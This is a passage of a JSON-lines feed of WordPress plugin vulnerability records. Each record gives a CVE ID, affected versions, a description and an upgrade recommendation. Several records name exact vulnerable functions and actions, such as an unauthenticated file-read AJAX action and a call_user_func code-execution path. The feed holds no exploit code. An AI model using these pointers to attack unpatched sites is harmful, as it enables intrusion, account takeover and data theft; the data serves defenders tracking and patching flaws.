version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-credit-for-woocommerce\\\/tags\\\/1.0.49.42\\\/admin\\\/report.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-credit-for-woocommerce\\\/tags\\\/1.0.49.42\\\/admin\\\/report.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-credit-for-woocommerce\\\/tags\\\/1.0.49.42\\\/admin\\\/report.php#L119\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-credit-for-woocommerce\\\/tags\\\/1.0.49.42\\\/admin\\\/report.php#L119\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-credit-for-woocommerce\\\/tags\\\/1.0.49.42\\\/admin\\\/report.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-credit-for-woocommerce\\\/tags\\\/1.0.49.42\\\/admin\\\/report.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3213698\\\/store-credit-for-woocommerce\\\/trunk\\\/admin\\\/report.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3213698\\\/store-credit-for-woocommerce\\\/trunk\\\/admin\\\/report.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e8527c0-a4b0-436d-901a-c07f93c7ec5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e8527c0-a4b0-436d-901a-c07f93c7ec5e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12809","slug":"wishlist","versionImpact":"1.0.43","versionEndExcluding":"1.0.44","description":"The Wishlist plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wishlist_button' shortcode in all versions up to, and including, 1.0.43 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wishlist\\\/trunk\\\/includes\\\/classes\\\/class-shortcodes.php?rev=3215801#L223\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wishlist\\\/trunk\\\/includes\\\/classes\\\/class-shortcodes.php?rev=3215801#L223\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242533%40wishlist&new=3242533%40wishlist&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242533%40wishlist&new=3242533%40wishlist&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251476%40wishlist&new=3251476%40wishlist&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251476%40wishlist&new=3251476%40wishlist&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b902d46-ff27-486f-836d-f55a8048f08c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b902d46-ff27-486f-836d-f55a8048f08c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4760","slug":"oneclick-whatsapp-order","versionEndExcluding":"1.0.4.2","description":"The OneClick Chat to Order WordPress plugin before 1.0.4.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad710c22-878a-441b-9c5a-90511b913d9d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad710c22-878a-441b-9c5a-90511b913d9d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6721","slug":"mrkv-vchasno-kasa","versionImpact":"1.0.3","versionEndExcluding":"1.0.4","description":"The Vchasno Kasa plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the mrkv_vchasno_kasa_wc_do_metabox_action() function in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to generate invoices for arbitrary orders.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mrkv-vchasno-kasa\\\/trunk\\\/classes\\\/mrkv-setup.php#L395\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mrkv-vchasno-kasa\\\/trunk\\\/classes\\\/mrkv-setup.php#L395\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3328827%40mrkv-vchasno-kasa&new=3328827%40mrkv-vchasno-kasa&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3328827%40mrkv-vchasno-kasa&new=3328827%40mrkv-vchasno-kasa&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57ad3525-3257-4727-ba07-468bf13a94e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57ad3525-3257-4727-ba07-468bf13a94e2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6720","slug":"mrkv-vchasno-kasa","versionImpact":"1.0.3","versionEndExcluding":"1.0.4","description":"The Vchasno Kasa plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the clear_all_log() function in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to clear log files.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mrkv-vchasno-kasa\\\/trunk\\\/classes\\\/mrkv-setup.php#L245\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mrkv-vchasno-kasa\\\/trunk\\\/classes\\\/mrkv-setup.php#L245\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3328827%40mrkv-vchasno-kasa&new=3328827%40mrkv-vchasno-kasa&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3328827%40mrkv-vchasno-kasa&new=3328827%40mrkv-vchasno-kasa&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd03483a-f46c-4e17-8b58-df87b0ad7fa3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd03483a-f46c-4e17-8b58-df87b0ad7fa3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13664","slug":"wp-post-list-table","versionImpact":"1.0.3","versionEndExcluding":"1.0.4","description":"The WP Post List Table plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpb_post_list_table' shortcode in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227735\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227735\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b18f6817-86db-4a72-a2e9-a9e047e05bc5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b18f6817-86db-4a72-a2e9-a9e047e05bc5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3664","slug":"fileorganizer","versionEndExcluding":"1.0.4","description":"The FileOrganizer WordPress plugin through 1.0.2 does not restrict functionality on multisite instances, allowing site admins to gain full control over the server.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d59e6eac-3ebf-40e0-800c-8cbef345423f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d59e6eac-3ebf-40e0-800c-8cbef345423f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13576","slug":"gumlet-video","versionImpact":"1.0.3","versionEndExcluding":"1.0.4","description":"The Gumlet Video plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gumlet' shortcode in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gumlet-video\\\/tags\\\/1.0.3\\\/gumlet-video.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gumlet-video\\\/tags\\\/1.0.3\\\/gumlet-video.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b8b94fc-9ae7-47f3-b804-92d0948b662e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b8b94fc-9ae7-47f3-b804-92d0948b662e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1086","slug":"preview-link-generator","versionEndExcluding":"1.0.4","description":"The Preview Link Generator WordPress plugin before 1.0.4 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2bda716-76dc-4a26-b26a-7a2a764757b0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2bda716-76dc-4a26-b26a-7a2a764757b0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32592","slug":"posts-table-filterable","versionImpact":"1.0.3","versionEndExcluding":"1.0.4","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 TableOn \u2013 WordPress Posts Table Filterable allows Stored XSS. This issue affects TableOn \u2013 WordPress Posts Table Filterable: from n\/a through 1.0.3.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/posts-table-filterable\\\/vulnerability\\\/wordpress-tableon-plugin-1-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/posts-table-filterable\\\/vulnerability\\\/wordpress-tableon-plugin-1-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11770","slug":"post-types-carousel-slider","versionImpact":"1.0.3","versionEndExcluding":"1.0.4","description":"The Post Carousel & Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'post-cs' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-types-carousel-slider\\\/trunk\\\/includes\\\/ajax.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-types-carousel-slider\\\/trunk\\\/includes\\\/ajax.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-types-carousel-slider\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-types-carousel-slider\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cc038af-c4c8-4141-bbe3-81bcf0a2bace?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cc038af-c4c8-4141-bbe3-81bcf0a2bace?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0604","slug":"wp-food-manager","versionEndExcluding":"1.0.4","description":"The WP Food Manager WordPress plugin before 1.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4492b5ad-c339-47f5-9003-a9c5f23efdd9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4492b5ad-c339-47f5-9003-a9c5f23efdd9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0509","slug":"wp-404-auto-redirect-to-similar-post","versionImpact":"1.0.3","versionEndExcluding":"1.0.4","description":"The WP 404 Auto Redirect to Similar Post plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018request\u2019 parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eef5549-3f89-4d6f-8c4e-6e4ee6082042?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eef5549-3f89-4d6f-8c4e-6e4ee6082042?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031134\\\/wp-404-auto-redirect-to-similar-post\\\/trunk\\\/includes\\\/ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031134\\\/wp-404-auto-redirect-to-similar-post\\\/trunk\\\/includes\\\/ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12849","slug":"error-log-viewer-wp","versionImpact":"1.0.1.3","versionEndExcluding":"1.0.4","description":"The Error Log Viewer By WP Guru plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.0.1.3 via the wp_ajax_nopriv_elvwp_log_download AJAX action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/error-log-viewer-wp\\\/tags\\\/1.0.1.3\\\/error-log-viewer-wp.php#L295\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/error-log-viewer-wp\\\/tags\\\/1.0.1.3\\\/error-log-viewer-wp.php#L295\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/error-log-viewer-wp\\\/tags\\\/1.0.1.3\\\/error-log-viewer-wp.php#L479\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/error-log-viewer-wp\\\/tags\\\/1.0.1.3\\\/error-log-viewer-wp.php#L479\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215563%40error-log-viewer-wp&new=3215563%40error-log-viewer-wp&sfp_email=&sfph_mail=#file10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215563%40error-log-viewer-wp&new=3215563%40error-log-viewer-wp&sfp_email=&sfph_mail=#file10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57888e36-3a61-4452-b4ea-9db9e422dc2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57888e36-3a61-4452-b4ea-9db9e422dc2d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13398","slug":"checkout-for-paypal","versionImpact":"1.0.32","versionEndExcluding":"1.0.33","description":"The Checkout for PayPal plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'checkout_for_paypal' shortcode in all versions up to, and including, 1.0.32 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223256%40checkout-for-paypal&new=3223256%40checkout-for-paypal&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223256%40checkout-for-paypal&new=3223256%40checkout-for-paypal&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2e552b8-84ad-436d-b029-f7dd4534f7d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2e552b8-84ad-436d-b029-f7dd4534f7d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11295","slug":"simple-page-access-restriction","versionImpact":"1.0.29","versionEndExcluding":"1.0.30","description":"The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.29 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users.","recommendation":"Update to version 1.0.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205648\\\/simple-page-access-restriction\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205648\\\/simple-page-access-restriction\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed92806e-5d75-4a23-a588-821e9ada1b32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed92806e-5d75-4a23-a588-821e9ada1b32?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3811","slug":"wpbookit","versionImpact":"1.0.2","versionEndExcluding":"1.0.3","description":"The WPBookit plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.0.2. This is due to the plugin not properly validating a user's identity prior to updating their details like email through the edit_newdata_customer_callback() function. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"Update to version 1.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3278939\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-customer-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3278939\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-customer-controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a61cce43-0df7-4ca9-8897-24c7d131b505?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a61cce43-0df7-4ca9-8897-24c7d131b505?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3810","slug":"wpbookit","versionImpact":"1.0.2","versionEndExcluding":"1.0.3","description":"The WPBookit plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.0.2. This is due to the plugin not properly validating a user's identity prior to updating their details like password and email through the edit_profile_data() function. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses and passwords, including administrators, and leverage that to gain access to their account.","recommendation":"Update to version 1.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3278939\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-profile-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3278939\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-profile-controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54f1ebfb-67f1-461d-91f1-269b0a2c0653?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54f1ebfb-67f1-461d-91f1-269b0a2c0653?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5943","slug":"advanced-quiz","versionImpact":"1.0.2","versionEndExcluding":"1.0.3","description":"The Wp-Adv-Quiz WordPress plugin before 1.0.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 1.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18fbe9d5-4829-450b-988c-8ba4becd032a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18fbe9d5-4829-450b-988c-8ba4becd032a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2600","slug":"custom-base-terms","versionEndExcluding":"1.0.3","description":"The Custom Base Terms WordPress plugin before 1.0.3 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e1d65c3-14e4-482f-ae9e-323e847a8613\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e1d65c3-14e4-482f-ae9e-323e847a8613\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2546","slug":"wp-user-switch","versionEndExcluding":"1.0.3","description":"The WP User Switch plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0.2. This is due to incorrect authentication checking in the 'wpus_allow_user_to_admin_bar_menu' function with the 'wpus_who_switch' cookie value. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e89d912d-fa7a-4fb1-8872-95fa861c21ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e89d912d-fa7a-4fb1-8872-95fa861c21ca?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2921182\\\/wp-user-switch\\\/trunk\\\/inc\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2921182\\\/wp-user-switch\\\/trunk\\\/inc\\\/functions.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-switch\\\/trunk\\\/inc\\\/functions.php?rev=2237142#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-switch\\\/trunk\\\/inc\\\/functions.php?rev=2237142#L33\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5392","slug":"gb-forms-db","versionImpact":"1.0.2","versionEndExcluding":"1.0.3","description":"The GB Forms DB plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.0.2 via the gbfdb_talk_to_front() function. This is due to the function accepting user input and then passing that through call_user_func(). This makes it possible for unauthenticated attackers to execute code on the server which can be leveraged to inject backdoors or create new administrative user accounts, to name a few things.","recommendation":"Update to version 1.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gb-forms-db\\\/trunk\\\/core\\\/functions.php#L334\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gb-forms-db\\\/trunk\\\/core\\\/functions.php#L334\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gb-forms-db\\\/trunk\\\/core\\\/functions.php#L367\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gb-forms-db\\\/trunk\\\/core\\\/functions.php#L367\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3323703%40gb-forms-db&new=3323703%40gb-forms-db&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3323703%40gb-forms-db&new=3323703%40gb-forms-db&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe8723a7-bbb1-41a0-b222-3cf4eb44cd64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe8723a7-bbb1-41a0-b222-3cf4eb44cd64?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6220","slug":"piotnetforms","versionImpact":"1.0.28","versionEndExcluding":"1.0.29","description":"The Piotnet Forms plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'piotnetforms_ajax_form_builder' function in versions up to, and including, 1.0.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.0.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af2b7eac-a3f5-408f-b139-643e70b3f27a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af2b7eac-a3f5-408f-b139-643e70b3f27a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnetforms\\\/tags\\\/1.0.26\\\/inc\\\/forms\\\/ajax-form-builder.php#L430\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnetforms\\\/tags\\\/1.0.26\\\/inc\\\/forms\\\/ajax-form-builder.php#L430\",\"refsource\":\"\",\"tags\":[]}]"}
